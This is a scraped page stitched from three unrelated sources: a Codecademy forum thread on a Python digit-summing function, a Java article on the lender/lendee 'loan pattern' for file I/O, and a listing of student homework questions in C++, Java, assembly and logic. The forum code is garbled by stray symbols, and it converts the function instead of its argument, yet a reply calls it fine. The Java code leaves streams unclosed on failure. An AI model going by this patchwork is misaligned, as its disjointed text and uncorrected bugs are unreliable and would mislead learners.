you have two options, casting x to integer (int()) or cast total to string (str())
int()
str()
lets look at the following code (using strings):
a = "1"
b = "2"
c = "3"
d = a + b + c
print d # which will output: 123
and the other code (using integers):
a = 1
b = 2
c = 3
d = a + b + c
print d # will output 6
now, armed with this new knowledge, what would be the next logic step?
def digit_sum(n):# creates fucntion()string = str(digit_sum)#converts n into a string()total = 0 #initiate variable()for x in string:#iterate through the string()()x = int(string)# converts each iteration into an integer()()total = total + x #adding all the contents of the string()return total# returning the sum of the numbers in the string
x = int(string)# converts each iteration into an integer
your comment is false, this will convert your entire string into a integer again, you just want to do this to each individual element (x) in the string
Please read this topic to display indent:
I'm not sure what to replace "string" with. I originally placed the code: x = int(x) with the thought each iteration would now become an integer.
x = int(x)
I then receive the error: Your code looks a bit off--it threw a "invalid literal for int() with base 10: '<'" error.
I'm thinking there must be a very minor error in the existing code as the only step left is to convert x into an integer and I must convert x into an integer before adding it with total. Is the content between the int() brackets the error in the code?
also thank you for the tip, the existing code looks as follows:
def digit_sum(n):# creates fucntion
string = str(digit_sum)#converts n into a string
total = 0 #initiate variable
for x in string:
x = int(x)# converts each iteration into an integer
total = total + x #adding all the contents of the string
return total# returning the sum of the numbers in the string
this code looks fine, do you understand it all now?
This topic was automatically closed 7 days after the last reply. New replies are no longer allowed. | https://discuss.codecademy.com/t/does-your-code-take-one-argument/53936/6 | CC-MAIN-2017-47 | refinedweb | 498 | 53.89 |
This post is about implementing loan pattern in Java.
Use Case
Implement separation between the code that holds resource from that of accessing it such that the accessing code doesn’t need to manage the resources. The use case mentioned holds true when we write code to read/write to a file or querying SQL / NOSQL dbs. There are certainly API’s handled this with the help of AOP. But I thought if a pattern based approach could help us to deal with these kind of use case, that’s where I came to know about Loan Pattern (a.k.a lender lendee pattern).
What it does
Loan pattern takes a “lending approach” i.e the code which keep hold of the resources “lends” if to the calling code. The lender (a.k.a code which holds resources) manages the resources once the lendee (code accessing the resource) has used it (with no interest ). Lets get in to lender code:
/** * This class is an illustration of using loan pattern(a.k.a lender-lendee pattern) * @author prassee */ public class IOResourceLender { /** * Interface to write data to the buffer. Clients using this * class should provide impl of this interface * @author sysadmin * */ public interface WriteBlock { void call(BufferedWriter writer) throws IOException; } /** * Interface to read data from the buffer. Clients using this * class should provide impl of this interface * @author sysadmin * */ public interface ReadBlock { void call(BufferedReader reader) throws IOException; } /** * method which loans / lends the resource. Here {@link FileWriter} is the * resource lent. The resource is managed for the given impl of {@link WriteBlock} * * @param fileName * @param block * @throws IOException */ public static void writeUsing(String fileName, WriteBlock block) throws IOException { File csvFile = new File(fileName); if (!csvFile.exists()) { csvFile.createNewFile(); } FileWriter fw = new FileWriter(csvFile.getAbsoluteFile(), true); BufferedWriter bufferedWriter = new BufferedWriter(fw); block.call(bufferedWriter); bufferedWriter.close(); } /** * method which loans / lends the resource. Here {@link FileReader} is the * resource lent. The resource is managed for * the given impl of {@link ReadBlock} * * @param fileName * @param block * @throws IOException */ public static void readUsing(String fileName, ReadBlock block) throws IOException { File inputFile = new File(fileName); FileReader fileReader = new FileReader(inputFile.getAbsoluteFile()); BufferedReader bufferedReader = new BufferedReader(fileReader); block.call(bufferedReader); bufferedReader.close(); } }
The lender code holds a FileWriter, the resource and we also expect an implementation of WriteBlock so that writeUsing method just calls the method on the WriteBlock interface which is enclosed within the managing the resource. One the client(lendee) side we provide an anonymous implementation of WriteBlock. Here is the lendee code, Iam just giving an method its up to the you to use it in the class which you may like.
public void writeColumnNameToMetaFile(final String attrName, String fileName, final String[] colNames) throws IOException { IOResourceLender.writeUsing(fileName, new IOResourceLender.WriteBlock() { public void call(BufferedWriter out) throws IOException { StringBuilder buffer = new StringBuilder(); for (String string : colNames) { buffer.append(string); buffer.append(','); } out.append(attrName + ' = ' + buffer.toString()); out.newLine(); } }); }
The example uses the loan pattern for a simple file IO operation. However this code could be further improved by providing abstract lenders and lendee.The code for this post is shared in the following gist I welcome your comments and suggestions !!
Reference: Loan pattern in Java (a.k.a lender lendee pattern) from our JCG partner Prasanna Kumar at the Prassee on Scala blog.
Note that you must close the streams in a finally-block, otherwise a file descriptor remains open if the Block.call() fails. In a long running server app, this may exhaust the OS resources and trigger a grinding halt.
I usually use this pattern,but I never call “Loan pattern” and I don’t even call it what! | http://www.javacodegeeks.com/2013/01/loan-pattern-in-java-a-k-a-lender-lendee-pattern.html/comment-page-1/ | CC-MAIN-2015-18 | refinedweb | 606 | 55.84 |
#include <RCBase.h>
Inheritance diagram for RCBase< Type >:
These array objects implement copy-on-write semantics.
This abstract class defines two pure virtual functions, read and write and the local ValRef class. The ValRef class is returned for referenced array elements. This class is a proxy which avoids copy-on-read.
An object that implements copy-on-write arrays defines the [] operator (the index operator). The index operator can be used on either the right or left hand size of an assignment. For example, in the statements below a is an instance of an object that implements the index operator.
MyObj b = a; // b is a reference to a MyType v = a[i]; // A right-hand-side reference a[j] = v; // A left-hand-size reference
References counted objects share a reference to common data until an object is modified. The copy-on-write semantics means that a unique copy will be made before shared object is modified. Ideally this saves memory and improves performance.
In the example above a and b share a reference to the same data set. When a is read, there should be no effect (other than the read). However, when a is modified (by being written), a unique copy is made first. Although previously a and b referenced the same data, the write operation will force the creation of a unique copy for a and only a will be modified. The b object will retain its previous value.
In a better world there would be some way that the programmer could indicate to the C++ compiler that a particular operator [] function implements the right-hand-side or the left-hand-size semantics.
The naive implementation (which I used in the first two versions of a String class) turns out to be wrong. Here is the slightly simplified code from this somewhat incorrect String class. My intention was that the operator [] function below labeled "LHS" would implement copy-on-write. The operator [] labeled RHS would do a read and nothing more.
This code does not properly implement copy-on-write
// // operator [] (RHS) with an integer index // inline char String::operator [](const int ix) const { return pShare->str[ix]; }
// // operator[] (LHS), integer index // inline char & String::operator [](const int ix) { makeUnique(); // make a unique copy of the shared data return pShare->str[ix]; } // operator []
As it turned out, the function labeled LHS is called in most cases, whether the operator [] is on the left or right hand side of the expression. This results in copy-on-read which is, obviously, not desirable and destroys much of the utility for a reference counted object.
The proper implementation of the String object uses an instance of the ValRef object (instantiated for
char).
inline String::ValRef String::operator[](const int ix) { return ValRef( *this, ix ); }
The ValRef object is losely modeled after the Cref class in The C++ Programming Language, Third Edition by Bjarne Stroustrup, Section 11.12.
Definition at line 112 of file RCBase.h. | http://www.bearcave.com/software/string/doc/html/classRCBase.html | CC-MAIN-2017-47 | refinedweb | 496 | 52.8 |
In a recent post on React hooks, I advocated their usage and explained how they could make your functional components flexible, extendable, and reusable. I would like to bring your attention to one of my favorite hooks: useState().
In some cases, you need to bring some state logic into a function component. Instead of rewriting it as a class component, you can hook into React state and lifecycle features. Implementing it is easy!
import React from 'react'; import {useState} from 'react' function App() { const [importantThing, setImportantThing] = useState('initial value') return ( <div > {importantThing} </div> ); } export default App;
After importing useState from React, we see two values in an array being declared, and an initial value being set. The array is there to destructure the variables in useState, where the first value references the variable that lives in the state, and the second value is the reference to the function that changes the variable.
You can also set the variable to be an object, like so:
const [fruits, setFruits] = useState([{ apple: 'Granny Smith' }]);
Discussion (2)
Important note that using an object as state in hooks doesn't behave the same as Class
setState,
in Class's
setStateyou can pass only rhe updated object attributes and it will be merged with the current state, meanwhile in Hooks it will replace the whole object so you need to handle the merging yourself, like:
setFruits({...fruits, banana: 'minions'})
In this case, as same as arrays, it would be better to use the function callback and use the state that the callback gets as a param. | https://dev.to/danimal92/react-hooks-usestate-3316 | CC-MAIN-2022-05 | refinedweb | 260 | 51.11 |
Echoing an XML File with the SAX Parser
In real life, you.
In this exercise, you'll echo SAX parser events to
System.out. Consider it the "Hello World" version of an XML-processing program. It shows you how to use the SAX parser to get at the data and then echoes it to show you what you have.
Note: The code discussed in this section is in
Echo01.java. The file it operates on is
slideSample01.xml, as described in Writing a Simple XML File. (The browsable version is
slideSample01-xml.html.)
Creating the Skeleton
Start by creating a file named
Echo.javaand enter the skeleton for the application:
Because you'll run it standalone, you need a
mainmethod. And you need command-line arguments so that you can tell the application which file to echo.
Importing Classes
Next, add the
importstatements for the classes the application will use:import java.io.*; Echo { ...
The classes in
java.io, of course, are needed to do output. The
org.xml.saxpackage defines all the interfaces we use for the SAX parser. The
SAXParserFactoryclass creates the instance we use. It throws a
ParserConfigurationExceptionif it cannot produce a parser that matches the specified configuration of options. (Later, you'll see more about the configuration options.) The
SAXParseris what the factory returns for parsing, and the
DefaultHandlerdefines the class that will handle the SAX events that the parser generates.
Setting Up for I/O
The first order of business is to process the command-line argument, get the name of the file to echo, and set up the output stream. Add the following highlighted text to take care of those tasks and do a bit of additional housekeeping:public static void main(String argv[]) {
if (argv.length != 1) { System.err.println("Usage: cmd filename"); System.exit(1); } try { // Set up output stream out = new OutputStreamWriter(System.out, "UTF8"); } catch (Throwable t) { t.printStackTrace(); } System.exit(0);}
static private Writer out;
When we create the output stream writer, we are selecting the UTF-8 character encoding. We could also have chosen US-ASCII or UTF-16, which the Java platform also supports. For more information on these character sets, see Java Encoding Schemes.
Implementing the ContentHandler Interface
The most important interface for our current purposes is
ContentHandler. This interface requires a number of methods that the SAX parser invokes in response to various parsing events. The major event-handling methods are:
startDocument,
endDocument,
startElement,
endElement, and
characters.
The easiest way to implement this interface is to extend the
DefaultHandlerclass, defined in the
org.xml.sax.helperspackage. That class provides do-nothing methods for all the
ContentHandlerevents. Enter the following highlighted code to extend that class:
Note:
DefaultHandleralso defines do-nothing methods for the other major events, defined in the
DTDHandler,
EntityResolver, and
ErrorHandlerinterfaces. You'll learn more about those methods as we go along.
Each of these methods is required by the interface to throw a
SAXException. An exception thrown here is sent back to the parser, which sends it on to the code that invoked the parser. In the current program, this sequence means that it winds up back at the
Throwableexception handler at the bottom of the
mainmethod.
When a start tag or end tag is encountered, the name of the tag is passed as a
Stringto the
startElementor the
endElementmethod, as appropriate. When a start tag is encountered, any attributes it defines are also passed in an
Attributeslist. Characters found within the element are passed as an array of characters, along with the number of characters (
length) and an offset into the array that points to the first character.
Setting up the Parser
Now (at last) you're ready to set up the parser. Add the following highlighted code to set it up and get it started:public static void main(String argv[]) { if (argv.length != 1) { System.err.println("Usage: cmd filename"); System.exit(1); }
// Use an instance of ourselves as the SAX event handler DefaultHandler handler = new Echo();
// Use the default (non-validating) parser SAXParserFactory factory = SAXParserFactory.newInstance();try { // Set up output stream out = new OutputStreamWriter(System.out, "UTF8");
// Parse the input SAXParser saxParser = factory.newSAXParser(); saxParser.parse( new File(argv[0]), handler );} catch (Throwable t) { t.printStackTrace(); } System.exit(0); }
With these lines of code, you create a
SAXParserFactoryinstance, as determined by the setting of the
javax.xml.parsers.SAXParserFactorysystem property. You then get a parser from the factory and give the parser an instance of this class to handle the parsing events, telling it which input file to process.
Note: The
javax.xml.parsers.SAXParserclass is a wrapper that defines a number of convenience methods. It wraps the (somewhat less friendly)
org.xml.sax.Parserobject. If needed, you can obtain that parser using the
SAXParser's
getParser()method.
For now, you are simply catching any exception that the parser might throw. You'll learn more about error processing in a later section of this chapter, Handling Errors with the Nonvalidating Parser.
Writing the Output
The
ContentHandlermethods throw
SAXExceptions but not
IOExceptions, which can occur while writing. The
SAXExceptioncan wrap another exception, though, so it makes sense to do the output in a method that takes care of the exception-handling details. Add the following highlighted code to define an
emitmethod that does that:
static private Writer out;
private void emit(String s) throws SAXException { try { out.write(s); out.flush(); } catch (IOException e) { throw new SAXException("I/O error", e); } }...
When
emitis called, any I/O error is wrapped in
SAXExceptionalong with a message that identifies it. That exception is then thrown back to the SAX parser. You'll learn more about SAX exceptions later. For now, keep in mind that
emitis a small method that handles the string output. (You'll see it called often in later code.)
Spacing the Output
Here is another bit of infrastructure we need before doing some real processing. Add the following highlighted code to define an
nl()method that writes the kind of line-ending character used by the current system:private void emit(String s) ... }
private void nl() throws SAXException { String lineEnd = System.getProperty("line.separator"); try { out.write(lineEnd); } catch (IOException e) { throw new SAXException("I/O error", e); }}
Note: Although it seems like a bit of a nuisance, you will be invoking
nl()many times in later code. Defining it now will simplify the code later on. It also provides a place to indent the output when we get to that section of the tutorial.
Handling Content Events
Finally, let's write some code that actually processes the
ContentHandlerevents.
Document Events
Add the following highlighted code to handle the start-document and end-document events:static private Writer out;
public void startDocument() throws SAXException { emit("<?xml version='1.0' encoding='UTF-8'?>"); nl(); } public void endDocument() throws SAXException { try { nl(); out.flush(); } catch (IOException e) { throw new SAXException("I/O error", e); } }private void echoText() ...
Here, you are echoing an XML declaration when the parser encounters the start of the document. Because you set up
OutputStreamWriterusing UTF-8 encoding, you include that specification as part of the declaration.
Note: However, the IO classes don't understand the hyphenated encoding names, so you specified
UTF8for the
OutputStreamWriterrather than
UTF-8.
At the end of the document, you simply put out a final newline and flush the output stream. Not much going on there.
Element Events
Now for the interesting stuff. Add the following highlighted code to process the start-element and end-element events:
public void startElement(String namespaceURI, String sName, // simple name String qName, // qualified name Attributes attrs) throws SAXException { String eName = sName; // element name if ("".equals(eName)) eName = qName; // not namespace)+"\""); } } emit(">"); }
public void endElement(String namespaceURI, String sName, // simple name String qName // qualified name ) throws SAXException { String eName = sName; // element name if ("".equals(eName)) eName = qName; // not namespace-aware emit("</"+eName+">"); }private void emit(String s) ...
With this code, you echo the element tags, including any attributes defined in the start tag. Note that when the
startElement()method is invoked, if namespace processing is not enabled, then the simple name (local name) for elements and attributes could turn out to be the empty string. The code handles that case by using the qualified name whenever the simple name is the empty string.
Character Events
To finish handling the content events, you need to handle the characters that the parser delivers to your application.
Parsers are not required to return any particular number of characters at one time. A parser can return anything from a single character at a time up to several thousand and still be a standard-conforming implementation. So if your application needs to process the characters it sees, it is wise to accumulate the characters in a buffer and operate on them only when you are sure that all of them have been found.
Add the following highlighted line to define the text buffer:public class Echo01 extends DefaultHandler {
StringBuffer textBuffer;public static void main(String argv[]) { ...
Then add the following highlighted code to accumulate the characters the parser delivers in the buffer:public void endElement(...) throws SAXException { ... }
public void characters(char buf[], int offset, int len) throws SAXException { String s = new String(buf, offset, len); if (textBuffer == null) { textBuffer = new StringBuffer(s); } else { textBuffer.append(s); } }private void emit(String s) ...
Next, add the following highlighted method to send the contents of the buffer to the output stream.public void characters(char buf[], int offset, int len) throws SAXException { ... }
private void echoText() throws SAXException { if (textBuffer == null) return; String s = ""+textBuffer; emit(s); textBuffer = null; }private void emit(String s) ...
When this method is called twice in a row (which will happen at times, as you'll see next), the buffer will be null. In that case, the method simply returns. When the buffer is not null, however, its contents are sent to the output stream.
Finally, add the following highlighted code to echo the contents of the buffer whenever an element starts or ends:public void startElement(...) throws SAXException {
echoText();String eName = sName; // element name ... } public void endElement(...) throws SAXException {
echoText();String eName = sName; // element name ... }
You're finished accumulating text when an element ends, of course. So you echo it at that point, and that action clears the buffer before the next element starts.
But you also want to echo the accumulated text when an element starts! That's necessary for document-style data, which can contain XML elements that are intermixed with text. For example, consider this document fragment:
The initial text,
This paragraph contains, is terminated by the start of the
<bold>element. The text
importantis terminated by the end tag,
</bold>, and the final text,
ideas., is terminated by the end tag,
</para>.
Note: Most of the time, though, the accumulated text will be echoed when an
endElement()event occurs. When a
startElement()event occurs after that, the buffer will be empty. The first line in the
echoText()method checks for that case, and simply returns.
Congratulations! At this point you have written a complete SAX parser application. The next step is to compile and run it.
Note: To be strictly accurate, the character handler should scan the buffer for ampersand characters (
&);and left-angle bracket characters (<) and replace them with the strings
&or
<, as appropriate. You'll find out more about that kind of processing when we discuss entity references in Displaying Special Characters and CDATA.
Compiling and Running the Program
In the Application Server, the JAXP libraries are in the directory
<J2EE_HOME>
/lib/endorsed. These are newer versions of the standard JAXP libraries than those that are part of the Java 2 platform, Standard Edition versions 1.4.x.
The Application Server automatically uses the newer libraries when a program runs. So you don't have to be concerned with where they reside when you deploy an application. And because the JAXP APIs are identical in both versions, you don't need to be concerned at compile time either. So compiling the program you created is as simple as issuing this command:
But to run the program outside the server container, you must be sure that the
javaruntime finds the newer versions of the JAXP libraries. That situation can occur, for example, when you're unit-testing parts of your application outside of server, as well as here, when you're running the XML tutorial examples.
There are two ways to make sure that the program uses the latest version of the JAXP libraries:
- Copy the
<J2EE_HOME>
/lib/endorseddirectory to
<
J2EE_HOME
>/jdk/jre/lib/endorsed(if you are using the Java 2 SDK that comes with the Application Server) or
<JAVA_HOME>
/jre/lib/endorsed(if you are using a version of the Java 2 SDK that you have installed separately) You can then run the program with this command:
<
J2SE SDK installation>
/bin/java Echo slideSample.xml
The libraries will then be found in the endorsed standards directory.
- Use the endorsed directories system property to specify the location of the libraries, by specifying this option on the
javacommand line:
-D"java.endorsed.dirs=<
J2EE_HOME
>/lib/endorsed"or
-D"java.endorsed.dirs=
<JAVA_HOME>
/jre/lib/endorsed
Note: Because the JAXP APIs are already built into the Java 2 platform, Standard Edition, they don't need to be specified at compile time. However, when the JAXP factories instantiate an implementation, the endorsed directories mechanism is employed to make sure that the desired implementation is instantiated.
Checking the Output
Here is part of the program's output, showing some of its weird spacing:
...<slideshow title="Sample Slide Show" date="Date of publication" author="Yours Truly"> <slide type="all"> <title>Wake up to WonderWidgets!</title> </slide> ...
Note: The program's output is contained in
Echo01-01.txt. (The browsable version is
Echo01-01.html.)
When we look at this output, a number of questions arise. Where is the excess vertical whitespace coming from? And why are the elements indented properly, when the code isn't doing it? We'll answer those questions in a moment. First, though, there are a few points to note about the output:
- The comment defined at the top of the file
<!-- A SAMPLE set of slides -->
does not appear in the listing. Comments are ignored unless you implement a
LexicalHandler. You'll see more on that subject later in this tutorial.
- Element attributes are listed all together on a single line. If your window isn't really wide, you won't see them all.
- The single-tag empty element you defined (
<item/>) is treated exactly the same as a two-tag empty element (
<item></item>). It is, for all intents and purposes, identical. (It's just easier to type and consumes less space.)
Identifying the Events
This version of the echo program might be useful for displaying an XML file, but it doesn't tell you much about what's going on in the parser. The next step is to modify the program so that you see where the spaces and vertical lines are coming from.
Note: The code discussed in this section is in
Echo02.java. The output it produces is shown in
Echo02-01.txt. (The browsable version is
Echo02-01.html.)
Make the following highlighted changes to identify the events as they occur:public void startDocument() throws SAXException {
nl(); nl(); emit("START DOCUMENT"); nl();emit("<?xml version='1.0' encoding='UTF-8'?>");
nl();} public void endDocument() throws SAXException {
nl(); emit("END DOCUMENT");try { ... } public void startElement(...) throws SAXException { echoText();
nl(); emit("ELEMENT: ");String eName = sName; // element name if ("".equals(eName)) eName = qName; // not namespac)+"\"");
nl(); emit(" ATTR: "); emit(aName); emit("\t\""); emit(attrs.getValue(i)); emit("\"");} }
if (attrs.getLength() > 0) nl();emit(">"); } public void endElement(...) throws SAXException { echoText();
nl(); emit("END_ELM: ");String eName = sName; // element name if ("".equals(eName)) eName = qName; // not namespace-aware emit("<"+eName+">"); } ... private void echoText() throws SAXException { if (textBuffer == null) return;
nl(); emit("CHARS: |");String s = ""+textBuffer; emit(s);
emit("|");textBuffer = null; }
Compile and run this version of the program to produce a more informative output listing. The attributes are now shown one per line, and that is nice. But, more importantly, output lines such as the following show that both the indentation space and the newlines that separate the attributes come from the data that the parser passes to the
characters()method.
Note: The XML specification requires all input line separators to be normalized to a single newline. The newline character is specified as in Java, C, and UNIX systems, but goes by the alias "linefeed" in Windows systems.
Compressing the Output
To make the output more readable, modify the program so that it outputs only characters whose values are something other than whitespace.
Note: The code discussed in this section is in
Echo03.java.
Make the following changes to suppress output of characters that are all whitespace:public void echoText() throws SAXException { nl();
emit("CHARS: |");
emit("CHARS: ");String s = ""+textBuffer;
if (!s.trim().equals(""))emit(s);
emit("|");}
Next, add the following highlighted code to echo each set of characters delivered by the parser:public void characters(char buf[], int offset, int len) throws SAXException {
if (textBuffer != null) { echoText(); textBuffer = null; }String s = new String(buf, offset, len); ... }
If you run the program now, you will see that you have also eliminated the indentation, because the indent space is part of the whitespace that precedes the start of an element. Add the following highlighted code to manage the indentation:static private Writer out;
private String indentString = " "; // Amount to indent private int indentLevel = 0;... public void startElement(...) throws SAXException {
indentLevel++;nl(); emit("ELEMENT: "); ... } public void endElement(...) throws SAXException { nl(); emit("END_ELM: "); emit("</"+sName+">");
indentLevel--;} ... private void nl() throws SAXException { ... try { out.write(lineEnd);
for (int i=0; i < indentLevel; i++) out.write(indentString);} catch (IOException e) { ... }
This code sets up an indent string, keeps track of the current indent level, and outputs the indent string whenever the
nlmethod is called. If you set the indent string to "", the output will not be indented. (Try it. You'll see why it's worth the work to add the indentation.)
You'll be happy to know that you have reached the end of the "mechanical" code in the Echo program. From this point on, you'll be doing things that give you more insight into how the parser works. The steps you've taken so far, though, have given you a lot of insight into how the parser sees the XML data it processes. You have also gained a helpful debugging tool that you can use to see what the parser sees.
Inspecting the Output
Here is part of the output from this version of the program:
Note: The complete output is
Echo03-01.txt. (The browsable version is
Echo03-01.html.)
Note that the
charactersmethod is invoked twice in a row. Inspecting the source file
slideSample01.xmlshows that there is a comment before the first slide. The first call to
characterscomes before that comment. The second call comes after. (Later, you'll see how to be notified when the parser encounters a comment, although in most cases you won't need such notifications.)
Note, too, that the
charactersmethod is invoked after the first slide element, as well as before. When you are thinking in terms of hierarchically structured data, that seems odd. After all, you intended for the
slideshowelement to contain
slideelements and not text. Later, you'll see how to restrict the
slideshowelement by using a DTD. When you do that, the
charactersmethod will no longer be invoked.
In the absence of a DTD, though, the parser must assume that any element it sees contains text such as that in the first item element of the overview slide:
Here, the hierarchical structure looks like this:
ELEMENT: <item>CHARS: Why ELEMENT: <em> CHARS: WonderWidgets END_ELM: </em> CHARS: are great END_ELM: </item>
Documents and Data
In this example, it's clear that there are characters intermixed with the hierarchical structure of the elements. The fact that text can surround elements (or be prevented from doing so with a DTD or schema) helps to explain why you sometimes hear talk about "XML data" and other times hear about "XML documents." XML comfortably handles both structured data and text documents that include markup. The only difference between the two is whether or not text is allowed between the elements.
Note: In a later section of this tutorial, you will work with the
ignorableWhitespacemethod in the
ContentHandlerinterface. This method can be invoked only when a DTD is present. If a DTD specifies that
slideshowdoes not contain text, then all the whitespace surrounding the
slideelements is by definition ignorable. On the other hand, if
slideshowcan contain text (which must be assumed to be true in the absence of a DTD), then the parser must assume that spaces and lines it sees between the
slideelements are significant parts of the document. | http://java.sun.com/j2ee/1.4/docs/tutorial/doc/JAXPSAX3.html | crawl-002 | refinedweb | 3,487 | 55.95 |
Computer Science Archive: Questions from November 01, 2011
- Anonymous askedWrite the code to implement the e... Show moreI want 2 know hv i solved the below example correctly?plz check it.
Write the code to implement the expression A = (B+C) * (D + E) for
1) 3-address machines
2) 2-address machines
3) 1-address machines
4) 0-address machines
Solution:
Let B+C = M
And D+E = N
Writing code to implement the given expression i.e. A = (B+C) * (D + E)
3-Address 0-Address
add M,B,C
add N,D,E
mul A,M,N
2-Address
load M,B
add M,C
load N,D
add N,E
mul N,M
store A,M
1-Address
lda B
adda C
sta M
lda D
adda E
sta N
mula M
sta A
0-Address
push B
push C
add
push D
push E
add
mul
pop A
• Show less1 answer
- Anonymous asked: Analyze and Draw a “Cross Reference Matrix” to identify/show different reports and attributes,... More »1 answer
- EducatedRabbit5024 asked// :... Show more
How can I fix this debug "error"?
"error C2065: 'list' : undeclared identifier"
Program is here:
// : Defines the entry point for the console application.
//
#include<iostream>
#include<fstream>
#include<cctype>
using namespace std;
void initialize(int& lc, int list[]);
void copyText(ifstream& intext, ofstream& outtext, char& ch, int list[]);
void characterCount(char ch, int list[]);
void writeTotal(ofstream& outtext, int lc, int list[]);
int main()
{
//Step 1: Declare Variables
int lineCount;
int letterCount[26];
char ch;
ifstream infile;
ofstream outfile;
infile.open("textin.txt");
if (!infile)
{
cout << "Cannot open the input file."
<< endl;
}
outfile.open("textout.out");
initialize(lineCount, letterCount);
infile.get(ch);
while (infile)
{
copyText(infile, outfile, ch, letterCount);
lineCount++;
infile.get(ch);
}
writeTotal(outfile, lineCount, letterCount);
infile.close();
outfile.close();
system("pause");
return 0;
}
void initialize(int& lc, int list[])
{
int j;
lc = 0;
for (j = 0; j < 26; j++)
list[j] = 0;
} // end initialize
void copyText(ifstream& intext, ofstream& outtext, char& ch,
int list[])
{
while (ch != '\n')
{
outtext << ch;
characterCount (ch, list);
intext.get(ch);
}
outtext << ch;
}
void characterCount(char ch, int lst[])
{
int index;
ch = toupper(ch);
index = static_cast<int>(ch) - static_cast<int>('A');
if (0 <= index && index < 26)
list[index]++;
} // end characterCount
void writeTotal(ofstream& outtext, int lc, int list[])
{
int index;
outtext << endl << endl;
outtext << "The number of lines = " << lc << endl;
for (index = 0; index < 26; index++)
outtext<< static_cast<char>(index + static_cast<int>('A'))
<<" count = " << list[index] << endl;
}// end writeTotal
• Show less2 answers
- Anonymous askedc.) Suppose... Show more
a. ) What is v?
b.) If Alice chooses r = 10, what does Alice send in the first message?
c.) Suppose Alice chooses r = 10 and Bob sends e = 0 in message two. What does Alice send in the third message?
d.) Suppose Alice chooses r = 10 and Bob sends e = 1 in message two. What does Alice send in the third message? • Show less1 answer
- Anonymous askedA well reputed Multinational Company urgently requires marketing executives for its Isl... Show moreQuestion No.1
A well reputed Multinational Company urgently requires marketing executives for its Islamabad branch. In order to be successful in this position; the candidate must be qualified to degree level or equivalent and must have experience in e-marketing. Good IT skills are necessary and an understanding of HTML is required. The candidate should have excellent interpersonal and communicational skills. Your detailed resume should reach by 20th November 2011 to 843, CII Gulberg Lahore.
Question No.2
Arrange five pairs of matching statements from the following and do tell us which principle of communication has been used?
(Clarity, courtesy, consideration, conciseness, concreteness, completeness, correctness.)
1. After planning 10,000 berry plants, the deer came into out botanist's farm and crushed them.
2. I am sorry the point was not clear; here is another version.
3. I rewrote that letter three times; the point was clear.
4. I am delighted to announce that we have extended our office hours to make shopping more convenient.
5. You will be able to shop evenings with the extended office hours.
6. After our botanists had planted 10,000 berry plants, the deer came into the farm and crushed them.
7. In 1996 the GMAT scores averaged 600; by 1997 they had risen to 610.
8. We hereby wish to let you know that our company is pleased with the confidence you have reposed in us.
9. Students’ GMAT scores are higher.
10. We appreciate your confidence. • Show less1 answer
- Anonymous askedYou are required to write a program for BILLING SYSTEM of a vir... Show moreProblem.
• Show less1 answer
- Anonymous askedand always incr... Show more“Commonly it considered that degree of multiprogramming is affecting CPU utilization
and always increase the CPU utilization.” In either case “yes” or “no”, justify the given
statement with strong arguments. Write the answer in your own words. • Show less1 answer
- Anonymous askedConstruc... Show more
Question 1;• Show less
Show that ~(p V (~ p Λ q) ≡ ~2 answers
- Anonymous askedand always incr... Show more“Commonly it considered that degree of multiprogramming is affecting CPU utilization
and always increase the CPU utilization.” In either case “yes” or “no”, justify the given
statement with strong arguments. • Show less1 answer
- MachoBattleship218 asked2)Write code to display a dialog box wit... Show moreQuestion Details
1)Create a new Java file called Lab1.java.
2)Write code to display a dialog box with text "Part One" and an OK button.
3)Declare two integers num1 and num2.
4) Assign a random number in the range 1-24 to variable num1. Here's how:
// number of possible values \ / lowest possible value
// | |
// v v
num1 = (int)( Math.random() * 24 ) + 1; // random number in range 1-24
5)Assign a random number in the range 10-30 to variable num2.
6)Create an input dialog box that shows the numbers to the user, then asks the user to type in the operation to be performed. The dialog box text should look like this (use a newline character to add a line break):
The numbers are num1 and num2.
Would you like to add or multiply the numbers?
7) Create an if-else-if statement that compares what the user entered to character string add, then compares to multiply. Ignore whether the letters are in uppercase or lowercase. HINT: use the equalsIgnoreCase() method.
8) If the user entered add, add the numbers and display the result in a dialog box as follows:
num1 plus num2 is equal to answer.
9) If the user entered multiply, multiply the numbers and display the result in a dialog box as follows:
num1 times num2 is equal to answer.
10) In all other cases, display an error message. Change the icon in the dialog box to a red X and display ERROR in the title bar of the dialog box.
11)Write code to display a dialog box with text "Part Two" and an OK button.
12) Declare two String variables called name1 and name2.
13) Use dialog boxes to prompt the user to enter in two last names, one after the other.
14)Once entered, display the names in a dialog box as follows:
You entered name1 and name2.
15 Find out what happens if the user clicks on the Cancel button instead of entering a name?
16)Add if statements to your code to check whether the user hit the Cancel button for either name. More specifically, if the user hits the Cancel button, display the following message in a dialog box, then exit the program:
Thanks anyways. Click OK to exit.
17)Add if statements to determine if the names entered by the user are the same. Use the equals() method to do so. If the names are the same, display the following message in a dialog box, then exit the program:
Duplicate names detected. Click OK to exit.
18)At this point in the code, we know that two names have been entered by the user and that each name is different. Add if statements to display the names in alphabetical order in a dialog box. Use the compareTo() method to determine the correct order of variables name1 and name2. • Show less1 answer
- Anonymous askedEach unit in a Latin textbook contains a Latin-English vocabulary of words that have been u... Show moreQUESTION:
Each unit in a Latin textbook contains a Latin-English vocabulary of words that have been used for the first time in a particular time. Write a program that converts a set of such vocabularies stored in file Latin in to a set of English-Latin vocabularies. Make the following assumptions:
a. Unit names are preceded by a percentage symbol.
b. There is only one entry per line.
c. A Latin word is separated by a colon from its English equivalent(s); if there is more than one equivalent, they are separated by a comma.
To output English words in alphabetical order, create a binary search tree for each unit containing English words and linked lists of Latin equivalents. Make sure that there is only one node for each English word in the tree. For example, there is only one node for and, although and is used twice in unit 6: with words ac and atque. After the task has been completed for a given unit (that is, the content of the tree has been stored in an output file), delete the tree along with all linked lists from computer memory before creating a tree for next unit.
Here is an example of a file containing Latin-English vocabularies:
%Unit 5
ante : before, in front of, previously
antiques : ancient
ardeo : burn, be on fire, desire
arma : arms, weapons
aurum : gold
aureus : golden, of gold
%Unit 6
animal : animal
Athenae : Athens
atque : and
ac : and
aurora : dawn
%Unit 7
amo : love
amor : love
annus : year
Asia : Asia
From these units, the program should generate the following output:
%Unit5
ancient : antiques
arms : arma
be on fire : ardeo
before : ante
burn : ardeo
desire : ardeo
gols : aurum
golden : aureus
in front of : ante
of gold : aureus
previously : ante
weapons : arma
%Unit 6
Athens : Athenae
and : ac, atque
animal : animal
dawn : aurora
%Unit 7
Asia : Asia
love : amor, amo
year : annus
• Show less1 answer
- Yoshi1 askedI wish I had experience with java :( Thank you so... Show more
Please help! I really appreciate your assistance!• Show less
I wish I had experience with java :( Thank you so very much!!
----------------------------------------------------------------------------
